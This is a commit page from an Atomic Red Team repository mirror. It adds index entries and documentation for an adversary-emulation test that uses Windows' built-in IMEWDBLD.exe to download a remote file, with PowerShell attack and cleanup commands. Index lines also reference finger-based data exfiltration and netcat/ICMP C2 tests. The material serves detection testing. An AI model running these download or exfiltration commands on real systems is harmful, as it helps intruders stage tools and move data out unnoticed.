security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci]

Browse Source
This commit is contained in:
CircleCI Atomic Red Team doc generator
2021-09-09 18:02:46 +00:00
parent 356a8bbe88
commit ba0b1a3c35
6 changed files with 75 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files
atomics/Indexes/Indexes-CSV/index.csv
+1
View File
@@ -920,6 +920,7 @@ command-and-control,T1105,Ingress Tool Transfer,13,Download a File with Windows
command-and-control,T1105,Ingress Tool Transfer,14,whois file download,c99a829f-0bb8-4187-b2c6-d47d1df74cab,sh
command-and-control,T1105,Ingress Tool Transfer,15,File Download via PowerShell,54a4daf1-71df-4383-9ba7-f1a295d8b6d2,powershell
command-and-control,T1105,Ingress Tool Transfer,16,File download with finger.exe on Windows,5f507e45-8411-4f99-84e7-e38530c45d01,command_prompt
command-and-control,T1105,Ingress Tool Transfer,17,Download a file with IMEWDBLD.exe,1a02df58-09af-4064-a765-0babe1a0d1e2,powershell
command-and-control,T1090.001,Internal Proxy,1,Connection Proxy,0ac21132-4485-4212-a681-349e8a6637cd,sh
command-and-control,T1090.001,Internal Proxy,2,Connection Proxy for macOS UI,648d68c1-8bcd-4486-9abe-71c6655b6a2c,sh
command-and-control,T1090.001,Internal Proxy,3,portproxy reg key,b8223ea9-4be2-44a6-b50a-9657a3d4e72a,powershell
1 Tactic Technique # Technique Name Test # Test Name Test GUID Executor Name
920 command-and-control T1105 Ingress Tool Transfer 14 whois file download c99a829f-0bb8-4187-b2c6-d47d1df74cab sh
921 command-and-control T1105 Ingress Tool Transfer 15 File Download via PowerShell 54a4daf1-71df-4383-9ba7-f1a295d8b6d2 powershell
922 command-and-control T1105 Ingress Tool Transfer 16 File download with finger.exe on Windows 5f507e45-8411-4f99-84e7-e38530c45d01 command_prompt
923 command-and-control T1105 Ingress Tool Transfer 17 Download a file with IMEWDBLD.exe 1a02df58-09af-4064-a765-0babe1a0d1e2 powershell
924 command-and-control T1090.001 Internal Proxy 1 Connection Proxy 0ac21132-4485-4212-a681-349e8a6637cd sh
925 command-and-control T1090.001 Internal Proxy 2 Connection Proxy for macOS UI 648d68c1-8bcd-4486-9abe-71c6655b6a2c sh
926 command-and-control T1090.001 Internal Proxy 3 portproxy reg key b8223ea9-4be2-44a6-b50a-9657a3d4e72a powershell
atomics/Indexes/Indexes-CSV/windows-index.csv
+1
View File
@@ -550,6 +550,7 @@ command-and-control,T1105,Ingress Tool Transfer,12,svchost writing a file to a U
command-and-control,T1105,Ingress Tool Transfer,13,Download a File with Windows Defender MpCmdRun.exe,815bef8b-bf91-4b67-be4c-abe4c2a94ccc,command_prompt
command-and-control,T1105,Ingress Tool Transfer,15,File Download via PowerShell,54a4daf1-71df-4383-9ba7-f1a295d8b6d2,powershell
command-and-control,T1105,Ingress Tool Transfer,16,File download with finger.exe on Windows,5f507e45-8411-4f99-84e7-e38530c45d01,command_prompt
command-and-control,T1105,Ingress Tool Transfer,17,Download a file with IMEWDBLD.exe,1a02df58-09af-4064-a765-0babe1a0d1e2,powershell
command-and-control,T1090.001,Internal Proxy,3,portproxy reg key,b8223ea9-4be2-44a6-b50a-9657a3d4e72a,powershell
command-and-control,T1095,Non-Application Layer Protocol,1,ICMP C2,0268e63c-e244-42db-bef7-72a9e59fc1fc,powershell
command-and-control,T1095,Non-Application Layer Protocol,2,Netcat C2,bcf0d1c1-3f6a-4847-b1c9-7ed4ea321f37,powershell
1 Tactic Technique # Technique Name Test # Test Name Test GUID Executor Name
550 command-and-control T1105 Ingress Tool Transfer 13 Download a File with Windows Defender MpCmdRun.exe 815bef8b-bf91-4b67-be4c-abe4c2a94ccc command_prompt
551 command-and-control T1105 Ingress Tool Transfer 15 File Download via PowerShell 54a4daf1-71df-4383-9ba7-f1a295d8b6d2 powershell
552 command-and-control T1105 Ingress Tool Transfer 16 File download with finger.exe on Windows 5f507e45-8411-4f99-84e7-e38530c45d01 command_prompt
553 command-and-control T1105 Ingress Tool Transfer 17 Download a file with IMEWDBLD.exe 1a02df58-09af-4064-a765-0babe1a0d1e2 powershell
554 command-and-control T1090.001 Internal Proxy 3 portproxy reg key b8223ea9-4be2-44a6-b50a-9657a3d4e72a powershell
555 command-and-control T1095 Non-Application Layer Protocol 1 ICMP C2 0268e63c-e244-42db-bef7-72a9e59fc1fc powershell
556 command-and-control T1095 Non-Application Layer Protocol 2 Netcat C2 bcf0d1c1-3f6a-4847-b1c9-7ed4ea321f37 powershell
atomics/Indexes/Indexes-Markdown/index.md
+1
View File
@@ -1619,6 +1619,7 @@
- Atomic Test #14: whois file download [linux, macos]
- Atomic Test #15: File Download via PowerShell [windows]
- Atomic Test #16: File download with finger.exe on Windows [windows]
- Atomic Test #17: Download a file with IMEWDBLD.exe [windows]
- [T1090.001 Internal Proxy](../../T1090.001/T1090.001.md)
- Atomic Test #1: Connection Proxy [macos, linux]
- Atomic Test #2: Connection Proxy for macOS UI [macos]
atomics/Indexes/Indexes-Markdown/windows-index.md
+1
View File
@@ -982,6 +982,7 @@
- Atomic Test #13: Download a File with Windows Defender MpCmdRun.exe [windows]
- Atomic Test #15: File Download via PowerShell [windows]
- Atomic Test #16: File download with finger.exe on Windows [windows]
- Atomic Test #17: Download a file with IMEWDBLD.exe [windows]
- [T1090.001 Internal Proxy](../../T1090.001/T1090.001.md)
- Atomic Test #3: portproxy reg key [windows]
- T1001.001 Junk Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
atomics/Indexes/index.yaml
+26
View File
@@ -67202,6 +67202,32 @@ command-and-control:
command: 'finger base64_filedata@#{remote_host}
'
- name: Download a file with IMEWDBLD.exe
auto_generated_guid: 1a02df58-09af-4064-a765-0babe1a0d1e2
description: |
Use IMEWDBLD.exe (built-in to windows) to download a file. This will throw an error for an invalid dictionary file.
Downloaded files can be found in "%LocalAppData%\Microsoft\Windows\INetCache\<8_RANDOM_ALNUM_CHARS>/<FILENAME>[1].<EXTENSION>" or `%LocalAppData%\Microsoft\Windows\INetCache\IE\<8_RANDOM_ALNUM_CHARS>/<FILENAME>[1].<EXTENSION>.
Run "Get-ChildItem -Path C:\Users\<USERNAME>\AppData\Local\Microsoft\Windows\INetCache\ -Include <FILENAME>* -Recurse -Force -File -ErrorAction SilentlyContinue" without quotes and adding the correct username and file name to locate the file.
supported_platforms:
- windows
input_arguments:
remote_url:
description: Location of file to be downloaded.
type: url
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1105/T1105.yaml
file_name:
description: Name of the file to be downloaded without extension.
type: string
default: T1105
executor:
command: |
$imewdbled = $env:SystemRoot + "\System32\IME\SHARED\IMEWDBLD.exe"
& $imewdbled #{remote_url}
cleanup_command: "$inetcache = $env:LOCALAPPDATA + \"\\Microsoft\\Windows\\INetCache\\\"
\n$file_to_be_removed = [string[]] (Get-ChildItem -Path $inetcache -Include
#{file_name}* -Recurse -Force -File -ErrorAction SilentlyContinue)\ncmd.exe
/c \"del $file_to_be_removed\"\n"
name: powershell
T1090.001:
technique:
external_references:
atomics/T1105/T1105.md
+45
View File
@@ -36,6 +36,8 @@
- [Atomic Test #16 - File download with finger.exe on Windows](#atomic-test-16---file-download-with-fingerexe-on-windows)
- [Atomic Test #17 - Download a file with IMEWDBLD.exe](#atomic-test-17---download-a-file-with-imewdbldexe)
<br/>
@@ -663,4 +665,47 @@ finger base64_filedata@#{remote_host}
<br/>
<br/>
## Atomic Test #17 - Download a file with IMEWDBLD.exe
Use IMEWDBLD.exe (built-in to windows) to download a file. This will throw an error for an invalid dictionary file.
Downloaded files can be found in "%LocalAppData%\Microsoft\Windows\INetCache\<8_RANDOM_ALNUM_CHARS>/<FILENAME>[1].<EXTENSION>" or `%LocalAppData%\Microsoft\Windows\INetCache\IE\<8_RANDOM_ALNUM_CHARS>/<FILENAME>[1].<EXTENSION>.
Run "Get-ChildItem -Path C:\Users\<USERNAME>\AppData\Local\Microsoft\Windows\INetCache\ -Include <FILENAME>* -Recurse -Force -File -ErrorAction SilentlyContinue" without quotes and adding the correct username and file name to locate the file.
**Supported Platforms:** Windows
**auto_generated_guid:** 1a02df58-09af-4064-a765-0babe1a0d1e2
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| remote_url | Location of file to be downloaded. | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1105/T1105.yaml|
| file_name | Name of the file to be downloaded without extension. | string | T1105|
#### Attack Commands: Run with `powershell`!
```powershell
$imewdbled = $env:SystemRoot + "\System32\IME\SHARED\IMEWDBLD.exe"
& $imewdbled #{remote_url}
```
#### Cleanup Commands:
```powershell
$inetcache = $env:LOCALAPPDATA + "\Microsoft\Windows\INetCache\"
$file_to_be_removed = [string[]] (Get-ChildItem -Path $inetcache -Include #{file_name}* -Recurse -Force -File -ErrorAction SilentlyContinue)
cmd.exe /c "del $file_to_be_removed"
```
<br/>